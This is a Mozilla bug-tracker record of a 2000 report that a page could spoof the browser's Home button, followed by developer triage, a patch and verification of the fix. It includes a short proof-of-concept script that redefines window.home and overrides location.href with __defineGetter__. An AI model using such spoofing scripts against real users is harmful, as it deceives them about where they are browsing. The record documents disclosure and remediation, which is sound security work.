Closed Bug 44014 Opened 24 years ago Closed 23 years ago

spoofing user's "Home"

Categories

(Core :: Security, defect, P2)

Product:
Core
Component:
Security
Type:
defect

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla0.9.1

People

(Reporter: security-bugs, Assigned: security-bugs)

References

Details

(Whiteboard: [need reviews])

Attachments

(1 file)

jst's patch - makes location permanent
1.75 KB, patch
Details | Diff | Splinter Review 
Date: 
          Mon, 26 Jun 2000 16:48:03 +0300
   From: 
          Georgi Guninski <joro@nat.bg>
      To: 
          Mitchell Stoltz <mstoltz@netscape.com>




It is possible to change the behavior of clicking the "Home" button or
choosing "Go|Home" from the menu.
The exploit uses __defineGetter__ and redefinion of window.home().
I think that allowing redefinition of predefined functions is not a good
idea.

The code is:
---------------------------------------
Press the "Home" button or choose "Go|Home" in the other window in 2
seconds.
<SCRIPT>
a=window.open("about:blank","a");
function f()
{
a.location.__defineGetter__("href",function() {return
"http://www.yahoo.com"});
a.window.home=new Function("this.document.body.innerHTML='Spoofed'");
a.window.home();
}
setTimeout("f()",2000);
</SCRIPT>
---------------------------------------
This testcase does not behave as described, but the vulnerabilities mentioned
should be addressed.
Status: NEW → ASSIGNED
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit 
and look at the issue of redefining properties.
Target Milestone: --- → M18
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for 
__defineGetter__, this should be fixed now, i think.
Depends on: 36946
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect
of this bug. Patrick, can you give me a + ?
Keywords: rtm
I've posted jst's patch which adds JSPROP_PERMANENT to the location property.
This dosn't completely fix the problem. Looks like we have to protect
location.href as well. 
Mitch, are you happy with the patch in this bug?  Can it go to reviews?  (Is it
OK to strcmp against "LOCATION" vs "location" or using strcasecmp?)  The fix is
reasonably small.  If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
This patch is not a complete fix. We need to restrict "location.href" as well.
I'll see about getting this done.
QA Contact: czhang → junruh
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
Keywords: rtm
removing rtm.
Mass changing QA to ckritzer.
QA Contact: junruh → ckritzer
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the
XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
Georgi thinks this is no longer an issue. You can still redefine window.home()
but this doesn't change the behavior of the Home button anymore. There are a few
other bugs dealing with redefining built-in proerties, but that's covered
elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Closed: 23 years ago
Resolution: --- → FIXED
Marking VERIFIED FIXED per originator on:
-MacOS91 2001-05-21-15-trunk
-Win98SE 2001-05-22-06-trunk
-LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED
Removing NS_Confidential flag.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: